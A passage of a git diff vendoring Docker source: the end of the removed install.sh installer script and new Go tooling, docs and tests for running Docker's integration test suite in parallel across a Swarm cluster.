- $sh_c 'sleep 3; dnf -y -q install docker-engine' - ) - elif [ "$lsb_dist" = "photon" ]; then - ( - set -x - $sh_c 'sleep 3; tdnf -y install docker-engine' - ) - else - ( - set -x - $sh_c 'sleep 3; yum -y -q install docker-engine' - ) - fi - echo_docker_as_nonroot - exit 0 - ;; - esac - - # intentionally mixed spaces and tabs here -- tabs are stripped by "<<-'EOF'", spaces are kept in the output - cat >&2 <<-'EOF' - - Either your platform is not easily detectable, is not supported by this - installer script (yet - PRs welcome! [hack/install.sh]), or does not yet have - a package for Docker. 
Please visit the following URL for more detailed - installation instructions: - - https://docs.docker.com/engine/installation/ - - EOF - exit 1 -} - -# wrapped up in a function so that we have some protection against only getting -# half the file during "curl | sh" -do_install diff --git a/vendor/github.com/docker/docker/hack/integration-cli-on-swarm/README.md b/vendor/github.com/docker/docker/hack/integration-cli-on-swarm/README.md new file mode 100644 index 0000000000..4f4f67d4f4 --- /dev/null +++ b/vendor/github.com/docker/docker/hack/integration-cli-on-swarm/README.md @@ -0,0 +1,69 @@ +# Integration Testing on Swarm + +IT on Swarm allows you to execute integration test in parallel across a Docker Swarm cluster + +## Architecture + +### Master service + + - Works as a funker caller + - Calls a worker funker (`-worker-service`) with a chunk of `-check.f` filter strings (passed as a file via `-input` flag, typically `/mnt/input`) + +### Worker service + + - Works as a funker callee + - Executes an equivalent of `TESTFLAGS=-check.f TestFoo|TestBar|TestBaz ... make test-integration` using the bind-mounted API socket (`docker.sock`) + +### Client + + - Controls master and workers via `docker stack` + - No need to have a local daemon + +Typically, the master and workers are supposed to be running on a cloud environment, +while the client is supposed to be running on a laptop, e.g. Docker for Mac/Windows. + +## Requirement + + - Docker daemon 1.13 or later + - Private registry for distributed execution with multiple nodes + +## Usage + +### Step 1: Prepare images + + $ make build-integration-cli-on-swarm + +Following environment variables are known to work in this step: + + - `BUILDFLAGS` + - `DOCKER_INCREMENTAL_BINARY` + +Note: during the transition into Moby Project, you might need to create a symbolic link `$GOPATH/src/github.com/docker/docker` to `$GOPATH/src/github.com/moby/moby`. 
+ +### Step 2: Execute tests + + $ ./hack/integration-cli-on-swarm/integration-cli-on-swarm -replicas 40 -push-worker-image YOUR_REGISTRY.EXAMPLE.COM/integration-cli-worker:latest + +Following environment variables are known to work in this step: + + - `DOCKER_GRAPHDRIVER` + - `DOCKER_EXPERIMENTAL` + +#### Flags + +Basic flags: + + - `-replicas N`: the number of worker service replicas. i.e. degree of parallelism. + - `-chunks N`: the number of chunks. By default, `chunks` == `replicas`. + - `-push-worker-image REGISTRY/IMAGE:TAG`: push the worker image to the registry. Note that if you have only single node and hence you do not need a private registry, you do not need to specify `-push-worker-image`. + +Experimental flags for mitigating makespan nonuniformity: + + - `-shuffle`: Shuffle the test filter strings + +Flags for debugging IT on Swarm itself: + + - `-rand-seed N`: the random seed. This flag is useful for deterministic replaying. By default(0), the timestamp is used. + - `-filters-file FILE`: the file contains `-check.f` strings. By default, the file is automatically generated. + - `-dry-run`: skip the actual workload + - `keep-executor`: do not auto-remove executor containers, which is used for running privileged programs on Swarm diff --git a/vendor/github.com/docker/docker/hack/integration-cli-on-swarm/agent/Dockerfile b/vendor/github.com/docker/docker/hack/integration-cli-on-swarm/agent/Dockerfile new file mode 100644 index 0000000000..1ae228f6ef --- /dev/null +++ b/vendor/github.com/docker/docker/hack/integration-cli-on-swarm/agent/Dockerfile @@ -0,0 +1,6 @@ +# this Dockerfile is solely used for the master image. +# Please refer to the top-level Makefile for the worker image. +FROM golang:1.7 +ADD . 
/go/src/github.com/docker/docker/hack/integration-cli-on-swarm/agent +RUN go build -buildmode=pie -o /master github.com/docker/docker/hack/integration-cli-on-swarm/agent/master +ENTRYPOINT ["/master"] diff --git a/vendor/github.com/docker/docker/hack/integration-cli-on-swarm/agent/master/call.go b/vendor/github.com/docker/docker/hack/integration-cli-on-swarm/agent/master/call.go new file mode 100644 index 0000000000..dab9c67077 --- /dev/null +++ b/vendor/github.com/docker/docker/hack/integration-cli-on-swarm/agent/master/call.go @@ -0,0 +1,132 @@ +package main + +import ( + "encoding/json" + "fmt" + "log" + "strings" + "sync" + "sync/atomic" + "time" + + "github.com/bfirsh/funker-go" + "github.com/docker/docker/hack/integration-cli-on-swarm/agent/types" +) + +const ( + // funkerRetryTimeout is for the issue https://github.com/bfirsh/funker/issues/3 + // When all the funker replicas are busy in their own job, we cannot connect to funker. + funkerRetryTimeout = 1 * time.Hour + funkerRetryDuration = 1 * time.Second +) + +// ticker is needed for some CI (e.g., on Travis, job is aborted when no output emitted for 10 minutes) +func ticker(d time.Duration) chan struct{} { + t := time.NewTicker(d) + stop := make(chan struct{}) + go func() { + for { + select { + case <-t.C: + log.Printf("tick (just for keeping CI job active) per %s", d.String()) + case <-stop: + t.Stop() + } + } + }() + return stop +} + +func executeTests(funkerName string, testChunks [][]string) error { + tickerStopper := ticker(9*time.Minute + 55*time.Second) + defer func() { + close(tickerStopper) + }() + begin := time.Now() + log.Printf("Executing %d chunks in parallel, against %q", len(testChunks), funkerName) + var wg sync.WaitGroup + var passed, failed uint32 + for chunkID, tests := range testChunks { + log.Printf("Executing chunk %d (contains %d test filters)", chunkID, len(tests)) + wg.Add(1) + go func(chunkID int, tests []string) { + defer wg.Done() + chunkBegin := time.Now() + result, err := 
executeTestChunkWithRetry(funkerName, types.Args{ + ChunkID: chunkID, + Tests: tests, + }) + if result.RawLog != "" { + for _, s := range strings.Split(result.RawLog, "\n") { + log.Printf("Log (chunk %d): %s", chunkID, s) + } + } + if err != nil { + log.Printf("Error while executing chunk %d: %v", + chunkID, err) + atomic.AddUint32(&failed, 1) + } else { + if result.Code == 0 { + atomic.AddUint32(&passed, 1) + } else { + atomic.AddUint32(&failed, 1) + } + log.Printf("Finished chunk %d [%d/%d] with %d test filters in %s, code=%d.", + chunkID, passed+failed, len(testChunks), len(tests), + time.Since(chunkBegin), result.Code) + } + }(chunkID, tests) + } + wg.Wait() + // TODO: print actual tests rather than chunks + log.Printf("Executed %d chunks in %s. PASS: %d, FAIL: %d.", + len(testChunks), time.Since(begin), passed, failed) + if failed > 0 { + return fmt.Errorf("%d chunks failed", failed) + } + return nil +} + +func executeTestChunk(funkerName string, args types.Args) (types.Result, error) { + ret, err := funker.Call(funkerName, args) + if err != nil { + return types.Result{}, err + } + tmp, err := json.Marshal(ret) + if err != nil { + return types.Result{}, err + } + var result types.Result + err = json.Unmarshal(tmp, &result) + return result, err +} + +func executeTestChunkWithRetry(funkerName string, args types.Args) (types.Result, error) { + begin := time.Now() + for i := 0; time.Since(begin) < funkerRetryTimeout; i++ { + result, err := executeTestChunk(funkerName, args) + if err == nil { + log.Printf("executeTestChunk(%q, %d) returned code %d in trial %d", funkerName, args.ChunkID, result.Code, i) + return result, nil + } + if errorSeemsInteresting(err) { + log.Printf("Error while calling executeTestChunk(%q, %d), will retry (trial %d): %v", + funkerName, args.ChunkID, i, err) + } + // TODO: non-constant sleep + time.Sleep(funkerRetryDuration) + } + return types.Result{}, fmt.Errorf("could not call executeTestChunk(%q, %d) in %v", funkerName, args.ChunkID, 
funkerRetryTimeout) +} + +// errorSeemsInteresting returns true if err does not seem about https://github.com/bfirsh/funker/issues/3 +func errorSeemsInteresting(err error) bool { + boringSubstrs := []string{"connection refused", "connection reset by peer", "no such host", "transport endpoint is not connected", "no route to host"} + errS := err.Error() + for _, boringS := range boringSubstrs { + if strings.Contains(errS, boringS) { + return false + } + } + return true +} diff --git a/vendor/github.com/docker/docker/hack/integration-cli-on-swarm/agent/master/master.go b/vendor/github.com/docker/docker/hack/integration-cli-on-swarm/agent/master/master.go new file mode 100644 index 0000000000..a0d9a0d381 --- /dev/null +++ b/vendor/github.com/docker/docker/hack/integration-cli-on-swarm/agent/master/master.go @@ -0,0 +1,65 @@ +package main + +import ( + "errors" + "flag" + "io/ioutil" + "log" + "strings" +) + +func main() { + if err := xmain(); err != nil { + log.Fatalf("fatal error: %v", err) + } +} + +func xmain() error { + workerService := flag.String("worker-service", "", "Name of worker service") + chunks := flag.Int("chunks", 0, "Number of chunks") + input := flag.String("input", "", "Path to input file") + randSeed := flag.Int64("rand-seed", int64(0), "Random seed") + shuffle := flag.Bool("shuffle", false, "Shuffle the input so as to mitigate makespan nonuniformity") + flag.Parse() + if *workerService == "" { + return errors.New("worker-service unset") + } + if *chunks == 0 { + return errors.New("chunks unset") + } + if *input == "" { + return errors.New("input unset") + } + + tests, err := loadTests(*input) + if err != nil { + return err + } + testChunks := chunkTests(tests, *chunks, *shuffle, *randSeed) + log.Printf("Loaded %d tests (%d chunks)", len(tests), len(testChunks)) + return executeTests(*workerService, testChunks) +} + +func chunkTests(tests []string, numChunks int, shuffle bool, randSeed int64) [][]string { + // shuffling (experimental) mitigates 
makespan nonuniformity + // Not sure this can cause some locality problem.. + if shuffle { + shuffleStrings(tests, randSeed) + } + return chunkStrings(tests, numChunks) +} + +func loadTests(filename string) ([]string, error) { + b, err := ioutil.ReadFile(filename) + if err != nil { + return nil, err + } + var tests []string + for _, line := range strings.Split(string(b), "\n") { + s := strings.TrimSpace(line) + if s != "" { + tests = append(tests, s) + } + } + return tests, nil +} diff --git a/vendor/github.com/docker/docker/hack/integration-cli-on-swarm/agent/master/set.go b/vendor/github.com/docker/docker/hack/integration-cli-on-swarm/agent/master/set.go new file mode 100644 index 0000000000..d28c41da7f --- /dev/null +++ b/vendor/github.com/docker/docker/hack/integration-cli-on-swarm/agent/master/set.go @@ -0,0 +1,28 @@ +package main + +import ( + "math/rand" +) + +// chunkStrings chunks the string slice +func chunkStrings(x []string, numChunks int) [][]string { + var result [][]string + chunkSize := (len(x) + numChunks - 1) / numChunks + for i := 0; i < len(x); i += chunkSize { + ub := i + chunkSize + if ub > len(x) { + ub = len(x) + } + result = append(result, x[i:ub]) + } + return result +} + +// shuffleStrings shuffles strings +func shuffleStrings(x []string, seed int64) { + r := rand.New(rand.NewSource(seed)) + for i := range x { + j := r.Intn(i + 1) + x[i], x[j] = x[j], x[i] + } +} diff --git a/vendor/github.com/docker/docker/hack/integration-cli-on-swarm/agent/master/set_test.go b/vendor/github.com/docker/docker/hack/integration-cli-on-swarm/agent/master/set_test.go new file mode 100644 index 0000000000..c172562b1b --- /dev/null +++ b/vendor/github.com/docker/docker/hack/integration-cli-on-swarm/agent/master/set_test.go @@ -0,0 +1,63 @@ +package main + +import ( + "fmt" + "reflect" + "testing" + "time" +) + +func generateInput(inputLen int) []string { + var input []string + for i := 0; i < inputLen; i++ { + input = append(input, fmt.Sprintf("s%d", i)) + } 
+ + return input +} + +func testChunkStrings(t *testing.T, inputLen, numChunks int) { + t.Logf("inputLen=%d, numChunks=%d", inputLen, numChunks) + input := generateInput(inputLen) + result := chunkStrings(input, numChunks) + t.Logf("result has %d chunks", len(result)) + var inputReconstructedFromResult []string + for i, chunk := range result { + t.Logf("chunk %d has %d elements", i, len(chunk)) + inputReconstructedFromResult = append(inputReconstructedFromResult, chunk...) + } + if !reflect.DeepEqual(input, inputReconstructedFromResult) { + t.Fatal("input != inputReconstructedFromResult") + } +} + +func TestChunkStrings_4_4(t *testing.T) { + testChunkStrings(t, 4, 4) +} + +func TestChunkStrings_4_1(t *testing.T) { + testChunkStrings(t, 4, 1) +} + +func TestChunkStrings_1_4(t *testing.T) { + testChunkStrings(t, 1, 4) +} + +func TestChunkStrings_1000_8(t *testing.T) { + testChunkStrings(t, 1000, 8) +} + +func TestChunkStrings_1000_9(t *testing.T) { + testChunkStrings(t, 1000, 9) +} + +func testShuffleStrings(t *testing.T, inputLen int, seed int64) { + t.Logf("inputLen=%d, seed=%d", inputLen, seed) + x := generateInput(inputLen) + shuffleStrings(x, seed) + t.Logf("shuffled: %v", x) +} + +func TestShuffleStrings_100(t *testing.T) { + testShuffleStrings(t, 100, time.Now().UnixNano()) +} diff --git a/vendor/github.com/docker/docker/hack/integration-cli-on-swarm/agent/types/types.go b/vendor/github.com/docker/docker/hack/integration-cli-on-swarm/agent/types/types.go new file mode 100644 index 0000000000..fc598f0330 --- /dev/null +++ b/vendor/github.com/docker/docker/hack/integration-cli-on-swarm/agent/types/types.go @@ -0,0 +1,18 @@ +package types + +// Args is the type for funker args +type Args struct { + // ChunkID is an unique number of the chunk + ChunkID int `json:"chunk_id"` + // Tests is the set of the strings that are passed as `-check.f` filters + Tests []string `json:"tests"` +} + +// Result is the type for funker result +type Result struct { + // ChunkID 
corresponds to Args.ChunkID + ChunkID int `json:"chunk_id"` + // Code is the exit code + Code int `json:"code"` + RawLog string `json:"raw_log"` +} diff --git a/vendor/github.com/docker/docker/hack/integration-cli-on-swarm/agent/vendor.conf b/vendor/github.com/docker/docker/hack/integration-cli-on-swarm/agent/vendor.conf new file mode 100644 index 0000000000..efd6d6d049 --- /dev/null +++ b/vendor/github.com/docker/docker/hack/integration-cli-on-swarm/agent/vendor.conf @@ -0,0 +1,2 @@ +# dependencies specific to worker (i.e. github.com/docker/docker/...) are not vendored here +github.com/bfirsh/funker-go eaa0a2e06f30e72c9a0b7f858951e581e26ef773 diff --git a/vendor/github.com/docker/docker/hack/integration-cli-on-swarm/agent/worker/executor.go b/vendor/github.com/docker/docker/hack/integration-cli-on-swarm/agent/worker/executor.go new file mode 100644 index 0000000000..eef80d461e --- /dev/null +++ b/vendor/github.com/docker/docker/hack/integration-cli-on-swarm/agent/worker/executor.go @@ -0,0 +1,118 @@ +package main + +import ( + "bytes" + "context" + "fmt" + "io" + "os" + "strings" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/container" + "github.com/docker/docker/api/types/mount" + "github.com/docker/docker/client" + "github.com/docker/docker/pkg/stdcopy" +) + +// testChunkExecutor executes integration-cli binary. +// image needs to be the worker image itself. testFlags are OR-set of regexp for filtering tests. 
+type testChunkExecutor func(image string, tests []string) (int64, string, error) + +func dryTestChunkExecutor() testChunkExecutor { + return func(image string, tests []string) (int64, string, error) { + return 0, fmt.Sprintf("DRY RUN (image=%q, tests=%v)", image, tests), nil + } +} + +// privilegedTestChunkExecutor invokes a privileged container from the worker +// service via bind-mounted API socket so as to execute the test chunk +func privilegedTestChunkExecutor(autoRemove bool) testChunkExecutor { + return func(image string, tests []string) (int64, string, error) { + cli, err := client.NewEnvClient() + if err != nil { + return 0, "", err + } + // propagate variables from the host (needs to be defined in the compose file) + experimental := os.Getenv("DOCKER_EXPERIMENTAL") + graphdriver := os.Getenv("DOCKER_GRAPHDRIVER") + if graphdriver == "" { + info, err := cli.Info(context.Background()) + if err != nil { + return 0, "", err + } + graphdriver = info.Driver + } + // `daemon_dest` is similar to `$DEST` (e.g. `bundles/VERSION/test-integration`) + // but it exists outside of `bundles` so as to make `$DOCKER_GRAPHDRIVER` work. + // + // Without this hack, `$DOCKER_GRAPHDRIVER` fails because of (e.g.) `overlay2 is not supported over overlayfs` + // + // see integration-cli/daemon/daemon.go + daemonDest := "/daemon_dest" + config := container.Config{ + Image: image, + Env: []string{ + "TESTFLAGS=-check.f " + strings.Join(tests, "|"), + "KEEPBUNDLE=1", + "DOCKER_INTEGRATION_TESTS_VERIFIED=1", // for avoiding rebuilding integration-cli + "DOCKER_EXPERIMENTAL=" + experimental, + "DOCKER_GRAPHDRIVER=" + graphdriver, + "DOCKER_INTEGRATION_DAEMON_DEST=" + daemonDest, + }, + Labels: map[string]string{ + "org.dockerproject.integration-cli-on-swarm": "", + "org.dockerproject.integration-cli-on-swarm.comment": "this non-service container is created for running privileged programs on Swarm. 
you can remove this container manually if the corresponding service is already stopped.", + }, + Entrypoint: []string{"hack/dind"}, + Cmd: []string{"hack/make.sh", "test-integration"}, + } + hostConfig := container.HostConfig{ + AutoRemove: autoRemove, + Privileged: true, + Mounts: []mount.Mount{ + { + Type: mount.TypeVolume, + Target: daemonDest, + }, + }, + } + id, stream, err := runContainer(context.Background(), cli, config, hostConfig) + if err != nil { + return 0, "", err + } + var b bytes.Buffer + teeContainerStream(&b, os.Stdout, os.Stderr, stream) + resultC, errC := cli.ContainerWait(context.Background(), id, "") + select { + case err := <-errC: + return 0, "", err + case result := <-resultC: + return result.StatusCode, b.String(), nil + } + } +} + +func runContainer(ctx context.Context, cli *client.Client, config container.Config, hostConfig container.HostConfig) (string, io.ReadCloser, error) { + created, err := cli.ContainerCreate(context.Background(), + &config, &hostConfig, nil, "") + if err != nil { + return "", nil, err + } + if err = cli.ContainerStart(ctx, created.ID, types.ContainerStartOptions{}); err != nil { + return "", nil, err + } + stream, err := cli.ContainerLogs(ctx, + created.ID, + types.ContainerLogsOptions{ + ShowStdout: true, + ShowStderr: true, + Follow: true, + }) + return created.ID, stream, err +} + +func teeContainerStream(w, stdout, stderr io.Writer, stream io.ReadCloser) { + stdcopy.StdCopy(io.MultiWriter(w, stdout), io.MultiWriter(w, stderr), stream) + stream.Close() +} diff --git a/vendor/github.com/docker/docker/hack/integration-cli-on-swarm/agent/worker/worker.go b/vendor/github.com/docker/docker/hack/integration-cli-on-swarm/agent/worker/worker.go new file mode 100644 index 0000000000..ea8bb3fe27 --- /dev/null +++ b/vendor/github.com/docker/docker/hack/integration-cli-on-swarm/agent/worker/worker.go @@ -0,0 +1,69 @@ +package main + +import ( + "flag" + "fmt" + "log" + "time" + + "github.com/bfirsh/funker-go" + 
"github.com/docker/distribution/reference" + "github.com/docker/docker/hack/integration-cli-on-swarm/agent/types" +) + +func main() { + if err := xmain(); err != nil { + log.Fatalf("fatal error: %v", err) + } +} + +func validImageDigest(s string) bool { + return reference.DigestRegexp.FindString(s) != "" +} + +func xmain() error { + workerImageDigest := flag.String("worker-image-digest", "", "Needs to be the digest of this worker image itself") + dryRun := flag.Bool("dry-run", false, "Dry run") + keepExecutor := flag.Bool("keep-executor", false, "Do not auto-remove executor containers, which is used for running privileged programs on Swarm") + flag.Parse() + if !validImageDigest(*workerImageDigest) { + // Because of issue #29582. + // `docker service create localregistry.example.com/blahblah:latest` pulls the image data to local, but not a tag. + // So, `docker run localregistry.example.com/blahblah:latest` fails: `Unable to find image 'localregistry.example.com/blahblah:latest' locally` + return fmt.Errorf("worker-image-digest must be a digest, got %q", *workerImageDigest) + } + executor := privilegedTestChunkExecutor(!*keepExecutor) + if *dryRun { + executor = dryTestChunkExecutor() + } + return handle(*workerImageDigest, executor) +} + +func handle(workerImageDigest string, executor testChunkExecutor) error { + log.Printf("Waiting for a funker request") + return funker.Handle(func(args *types.Args) types.Result { + log.Printf("Executing chunk %d, contains %d test filters", + args.ChunkID, len(args.Tests)) + begin := time.Now() + code, rawLog, err := executor(workerImageDigest, args.Tests) + if err != nil { + log.Printf("Error while executing chunk %d: %v", args.ChunkID, err) + if code == 0 { + // Make sure this is a failure + code = 1 + } + return types.Result{ + ChunkID: args.ChunkID, + Code: int(code), + RawLog: rawLog, + } + } + elapsed := time.Since(begin) + log.Printf("Finished chunk %d, code=%d, elapsed=%v", args.ChunkID, code, elapsed) + return 
types.Result{ + ChunkID: args.ChunkID, + Code: int(code), + RawLog: rawLog, + } + }) +} diff --git a/vendor/github.com/docker/docker/hack/integration-cli-on-swarm/host/compose.go b/vendor/github.com/docker/docker/hack/integration-cli-on-swarm/host/compose.go new file mode 100644 index 0000000000..a92282a1a0 --- /dev/null +++ b/vendor/github.com/docker/docker/hack/integration-cli-on-swarm/host/compose.go @@ -0,0 +1,122 @@ +package main + +import ( + "context" + "io/ioutil" + "os" + "path/filepath" + "text/template" + + "github.com/docker/docker/client" +) + +const composeTemplate = `# generated by integration-cli-on-swarm +version: "3" + +services: + worker: + image: "{{.WorkerImage}}" + command: ["-worker-image-digest={{.WorkerImageDigest}}", "-dry-run={{.DryRun}}", "-keep-executor={{.KeepExecutor}}"] + networks: + - net + volumes: +# Bind-mount the API socket so that we can invoke "docker run --privileged" within the service containers + - /var/run/docker.sock:/var/run/docker.sock + environment: + - DOCKER_GRAPHDRIVER={{.EnvDockerGraphDriver}} + - DOCKER_EXPERIMENTAL={{.EnvDockerExperimental}} + deploy: + mode: replicated + replicas: {{.Replicas}} + restart_policy: +# The restart condition needs to be any for funker function + condition: any + + master: + image: "{{.MasterImage}}" + command: ["-worker-service=worker", "-input=/mnt/input", "-chunks={{.Chunks}}", "-shuffle={{.Shuffle}}", "-rand-seed={{.RandSeed}}"] + networks: + - net + volumes: + - {{.Volume}}:/mnt + deploy: + mode: replicated + replicas: 1 + restart_policy: + condition: none + placement: +# Make sure the master can access the volume + constraints: [node.id == {{.SelfNodeID}}] + +networks: + net: + +volumes: + {{.Volume}}: + external: true +` + +type composeOptions struct { + Replicas int + Chunks int + MasterImage string + WorkerImage string + Volume string + Shuffle bool + RandSeed int64 + DryRun bool + KeepExecutor bool +} + +type composeTemplateOptions struct { + composeOptions + 
WorkerImageDigest string + SelfNodeID string + EnvDockerGraphDriver string + EnvDockerExperimental string +} + +// createCompose creates "dir/docker-compose.yml". +// If dir is empty, TempDir() is used. +func createCompose(dir string, cli *client.Client, opts composeOptions) (string, error) { + if dir == "" { + var err error + dir, err = ioutil.TempDir("", "integration-cli-on-swarm-") + if err != nil { + return "", err + } + } + resolved := composeTemplateOptions{} + resolved.composeOptions = opts + workerImageInspect, _, err := cli.ImageInspectWithRaw(context.Background(), defaultWorkerImageName) + if err != nil { + return "", err + } + if len(workerImageInspect.RepoDigests) > 0 { + resolved.WorkerImageDigest = workerImageInspect.RepoDigests[0] + } else { + // fall back for non-pushed image + resolved.WorkerImageDigest = workerImageInspect.ID + } + info, err := cli.Info(context.Background()) + if err != nil { + return "", err + } + resolved.SelfNodeID = info.Swarm.NodeID + resolved.EnvDockerGraphDriver = os.Getenv("DOCKER_GRAPHDRIVER") + resolved.EnvDockerExperimental = os.Getenv("DOCKER_EXPERIMENTAL") + composeFilePath := filepath.Join(dir, "docker-compose.yml") + tmpl, err := template.New("").Parse(composeTemplate) + if err != nil { + return "", err + } + f, err := os.Create(composeFilePath) + if err != nil { + return "", err + } + defer f.Close() + if err = tmpl.Execute(f, resolved); err != nil { + return "", err + } + return composeFilePath, nil +} diff --git a/vendor/github.com/docker/docker/hack/integration-cli-on-swarm/host/dockercmd.go b/vendor/github.com/docker/docker/hack/integration-cli-on-swarm/host/dockercmd.go new file mode 100644 index 0000000000..c08b763a2b --- /dev/null +++ b/vendor/github.com/docker/docker/hack/integration-cli-on-swarm/host/dockercmd.go @@ -0,0 +1,64 @@ +package main + +import ( + "fmt" + "os" + "os/exec" + "strings" + "time" + + "github.com/docker/docker/client" +) + +func system(commands [][]string) error { + for _, c := range 
commands { + cmd := exec.Command(c[0], c[1:]...) + cmd.Stdout = os.Stdout + cmd.Stderr = os.Stderr + cmd.Env = os.Environ() + if err := cmd.Run(); err != nil { + return err + } + } + return nil +} + +func pushImage(unusedCli *client.Client, remote, local string) error { + // FIXME: eliminate os/exec (but it is hard to pass auth without os/exec ...) + return system([][]string{ + {"docker", "image", "tag", local, remote}, + {"docker", "image", "push", remote}, + }) +} + +func deployStack(unusedCli *client.Client, stackName, composeFilePath string) error { + // FIXME: eliminate os/exec (but stack is implemented in CLI ...) + return system([][]string{ + {"docker", "stack", "deploy", + "--compose-file", composeFilePath, + "--with-registry-auth", + stackName}, + }) +} + +func hasStack(unusedCli *client.Client, stackName string) bool { + // FIXME: eliminate os/exec (but stack is implemented in CLI ...) + out, err := exec.Command("docker", "stack", "ls").CombinedOutput() + if err != nil { + panic(fmt.Errorf("`docker stack ls` failed with: %s", string(out))) + } + // FIXME: not accurate + return strings.Contains(string(out), stackName) +} + +func removeStack(unusedCli *client.Client, stackName string) error { + // FIXME: eliminate os/exec (but stack is implemented in CLI ...) 
+ if err := system([][]string{ + {"docker", "stack", "rm", stackName}, + }); err != nil { + return err + } + // FIXME + time.Sleep(10 * time.Second) + return nil +} diff --git a/vendor/github.com/docker/docker/hack/integration-cli-on-swarm/host/enumerate.go b/vendor/github.com/docker/docker/hack/integration-cli-on-swarm/host/enumerate.go new file mode 100644 index 0000000000..3354c23c07 --- /dev/null +++ b/vendor/github.com/docker/docker/hack/integration-cli-on-swarm/host/enumerate.go @@ -0,0 +1,55 @@ +package main + +import ( + "fmt" + "io/ioutil" + "path/filepath" + "regexp" +) + +var testFuncRegexp *regexp.Regexp + +func init() { + testFuncRegexp = regexp.MustCompile(`(?m)^\s*func\s+\(\w*\s*\*(\w+Suite)\)\s+(Test\w+)`) +} + +func enumerateTestsForBytes(b []byte) ([]string, error) { + var tests []string + submatches := testFuncRegexp.FindAllSubmatch(b, -1) + for _, submatch := range submatches { + if len(submatch) == 3 { + tests = append(tests, fmt.Sprintf("%s.%s$", submatch[1], submatch[2])) + } + } + return tests, nil +} + +// enumerateTests enumerates valid `-check.f` strings for all the test functions. +// Note that we use regexp rather than parsing Go files for performance reason. +// (Try `TESTFLAGS=-check.list make test-integration` to see the slowness of parsing) +// The files needs to be `gofmt`-ed +// +// The result will be as follows, but unsorted ('$' is appended because they are regexp for `-check.f`): +// "DockerAuthzSuite.TestAuthZPluginAPIDenyResponse$" +// "DockerAuthzSuite.TestAuthZPluginAllowEventStream$" +// ... 
+// "DockerTrustedSwarmSuite.TestTrustedServiceUpdate$" +func enumerateTests(wd string) ([]string, error) { + testGoFiles, err := filepath.Glob(filepath.Join(wd, "integration-cli", "*_test.go")) + if err != nil { + return nil, err + } + var allTests []string + for _, testGoFile := range testGoFiles { + b, err := ioutil.ReadFile(testGoFile) + if err != nil { + return nil, err + } + tests, err := enumerateTestsForBytes(b) + if err != nil { + return nil, err + } + allTests = append(allTests, tests...) + } + return allTests, nil +} diff --git a/vendor/github.com/docker/docker/hack/integration-cli-on-swarm/host/enumerate_test.go b/vendor/github.com/docker/docker/hack/integration-cli-on-swarm/host/enumerate_test.go new file mode 100644 index 0000000000..d6049ae52e --- /dev/null +++ b/vendor/github.com/docker/docker/hack/integration-cli-on-swarm/host/enumerate_test.go @@ -0,0 +1,84 @@ +package main + +import ( + "os" + "path/filepath" + "reflect" + "sort" + "strings" + "testing" +) + +func getRepoTopDir(t *testing.T) string { + wd, err := os.Getwd() + if err != nil { + t.Fatal(err) + } + wd = filepath.Clean(wd) + suffix := "hack/integration-cli-on-swarm/host" + if !strings.HasSuffix(wd, suffix) { + t.Skipf("cwd seems strange (needs to have suffix %s): %v", suffix, wd) + } + return filepath.Clean(filepath.Join(wd, "../../..")) +} + +func TestEnumerateTests(t *testing.T) { + if testing.Short() { + t.Skip("skipping in short mode") + } + tests, err := enumerateTests(getRepoTopDir(t)) + if err != nil { + t.Fatal(err) + } + sort.Strings(tests) + t.Logf("enumerated %d test filter strings:", len(tests)) + for _, s := range tests { + t.Logf("- %q", s) + } +} + +func TestEnumerateTestsForBytes(t *testing.T) { + b := []byte(`package main +import ( + "github.com/go-check/check" +) + +func (s *FooSuite) TestA(c *check.C) { +} + +func (s *FooSuite) TestAAA(c *check.C) { +} + +func (s *BarSuite) TestBar(c *check.C) { +} + +func (x *FooSuite) TestC(c *check.C) { +} + +func (*FooSuite) 
TestD(c *check.C) { +} + +// should not be counted +func (s *FooSuite) testE(c *check.C) { +} + +// counted, although we don't support ungofmt file + func (s *FooSuite) TestF (c *check.C){} +`) + expected := []string{ + "FooSuite.TestA$", + "FooSuite.TestAAA$", + "BarSuite.TestBar$", + "FooSuite.TestC$", + "FooSuite.TestD$", + "FooSuite.TestF$", + } + + actual, err := enumerateTestsForBytes(b) + if err != nil { + t.Fatal(err) + } + if !reflect.DeepEqual(expected, actual) { + t.Fatalf("expected %q, got %q", expected, actual) + } +} diff --git a/vendor/github.com/docker/docker/hack/integration-cli-on-swarm/host/host.go b/vendor/github.com/docker/docker/hack/integration-cli-on-swarm/host/host.go new file mode 100644 index 0000000000..fdc2a83e7f --- /dev/null +++ b/vendor/github.com/docker/docker/hack/integration-cli-on-swarm/host/host.go @@ -0,0 +1,198 @@ +package main + +import ( + "context" + "flag" + "fmt" + "io" + "io/ioutil" + "os" + "strings" + "time" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/filters" + "github.com/docker/docker/client" + "github.com/docker/docker/pkg/stdcopy" + "github.com/sirupsen/logrus" +) + +const ( + defaultStackName = "integration-cli-on-swarm" + defaultVolumeName = "integration-cli-on-swarm" + defaultMasterImageName = "integration-cli-master" + defaultWorkerImageName = "integration-cli-worker" +) + +func main() { + rc, err := xmain() + if err != nil { + logrus.Fatalf("fatal error: %v", err) + } + os.Exit(rc) +} + +func xmain() (int, error) { + // Should we use cobra maybe? + replicas := flag.Int("replicas", 1, "Number of worker service replica") + chunks := flag.Int("chunks", 0, "Number of test chunks executed in batch (0 == replicas)") + pushWorkerImage := flag.String("push-worker-image", "", "Push the worker image to the registry. Required for distributed execution. 
(empty == not to push)") + shuffle := flag.Bool("shuffle", false, "Shuffle the input so as to mitigate makespan nonuniformity") + // flags below are rarely used + randSeed := flag.Int64("rand-seed", int64(0), "Random seed used for shuffling (0 == current time)") + filtersFile := flag.String("filters-file", "", "Path to optional file composed of `-check.f` filter strings") + dryRun := flag.Bool("dry-run", false, "Dry run") + keepExecutor := flag.Bool("keep-executor", false, "Do not auto-remove executor containers, which is used for running privileged programs on Swarm") + flag.Parse() + if *chunks == 0 { + *chunks = *replicas + } + if *randSeed == int64(0) { + *randSeed = time.Now().UnixNano() + } + cli, err := client.NewEnvClient() + if err != nil { + return 1, err + } + if hasStack(cli, defaultStackName) { + logrus.Infof("Removing stack %s", defaultStackName) + removeStack(cli, defaultStackName) + } + if hasVolume(cli, defaultVolumeName) { + logrus.Infof("Removing volume %s", defaultVolumeName) + removeVolume(cli, defaultVolumeName) + } + if err = ensureImages(cli, []string{defaultWorkerImageName, defaultMasterImageName}); err != nil { + return 1, err + } + workerImageForStack := defaultWorkerImageName + if *pushWorkerImage != "" { + logrus.Infof("Pushing %s to %s", defaultWorkerImageName, *pushWorkerImage) + if err = 